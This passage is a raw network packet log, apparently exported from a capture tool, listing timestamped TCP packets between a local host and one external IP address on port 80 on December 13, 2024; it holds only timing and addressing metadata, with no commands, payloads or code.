                                                                                                                                                                                                Dec 13, 2024 08:18:56.367952108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.368073940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.368107080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.369168043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.369244099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.369277954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.370357037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.370476007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.370511055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.371541023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.371633053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.371670008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.372742891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.372870922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.372917891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.373960018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.374001980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.374036074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.375169992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.375252962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.375324965 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.376328945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.376449108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.376482010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.377564907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.377748013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.377800941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.378703117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.378781080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.378813982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.379914045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.380022049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.380065918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.381181955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.381283045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.381325960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.382294893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.382356882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.382395029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.383524895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.383546114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.383621931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.384766102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.384887934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.384949923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.385914087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.386030912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.386075020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.387058973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.387178898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.387213945 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.388298035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.388376951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.388420105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.389482975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.389571905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.389616013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.390857935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.390966892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.391010046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.391870975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.392124891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.392169952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.393064022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.393172979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.393217087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.394267082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.394455910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.394495964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.395422935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.395561934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.395606041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.396644115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.396717072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.396764040 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.397836924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.397934914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.397979021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.399085999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.399216890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.399260044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.400230885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.400319099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.400361061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.401408911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.401536942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.401573896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.402637005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.402719975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.402756929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.403815985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.403908014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.403949022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.404968023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.405081034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.405122042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.406167030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.406215906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.406366110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.407366037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.407480955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.407540083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.408569098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.408680916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.408740044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.409940958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.409955025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.410015106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.410964012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.411022902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.411071062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.412143946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.412309885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.412350893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.413327932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.413450956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.413496971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.414568901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.414726019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.414786100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.415728092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.415862083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.415905952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.416970968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.417067051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.417114973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.418119907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.418168068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.418215036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.419542074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.419555902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.419615984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.420526028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.420646906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.420690060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.423008919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454304934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454324961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454377890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454387903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454428911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454473972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454793930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.454952002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.455014944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.455873966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.456022978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.456084013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.457108021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.457119942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.457190037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.458121061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.458291054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.458353043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.459366083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.459435940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.459472895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.460562944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.460675955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.460747957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.461704969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.461802006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.461860895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.462888956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463017941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463222980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463341951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463399887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463412046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463437080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463567019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.463606119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464167118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464224100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464235067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464261055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464339018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.464375019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465037107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465058088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465095043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465177059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465188026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465221882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465913057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465965986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.465976000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466003895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466003895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466042042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466654062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466711998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466722012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466747046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466815948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.466852903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467513084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467585087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467595100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467617035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467732906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.467768908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468367100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468405008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468414068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468436003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468530893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.468568087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469175100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469228983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469239950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469264984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469309092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469378948 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.469999075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.470232010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.470241070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.470268011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.471637011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.471707106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472524881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472538948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472549915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472575903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472593069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472594023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472604036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472615004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472621918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472625971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472636938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472645998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472647905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472671032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.472690105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473136902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473149061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473160028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473177910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473326921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.473361969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474081039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474097013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474107027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474129915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474267006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474298000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474909067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474920988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474931955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.474956989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475053072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475085974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475469112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475507021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475518942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475544930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475716114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.475750923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476524115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476536036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476546049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476572037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476658106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.476696968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477332115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477344036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477355003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477385044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477511883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.477543116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478143930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478199005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478209972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478220940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478236914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478255987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478940010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478950977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478961945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.478984118 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479209900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479244947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479866028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479881048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479893923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.479926109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480047941 CET8049726185.81.68.147192.168.2.11
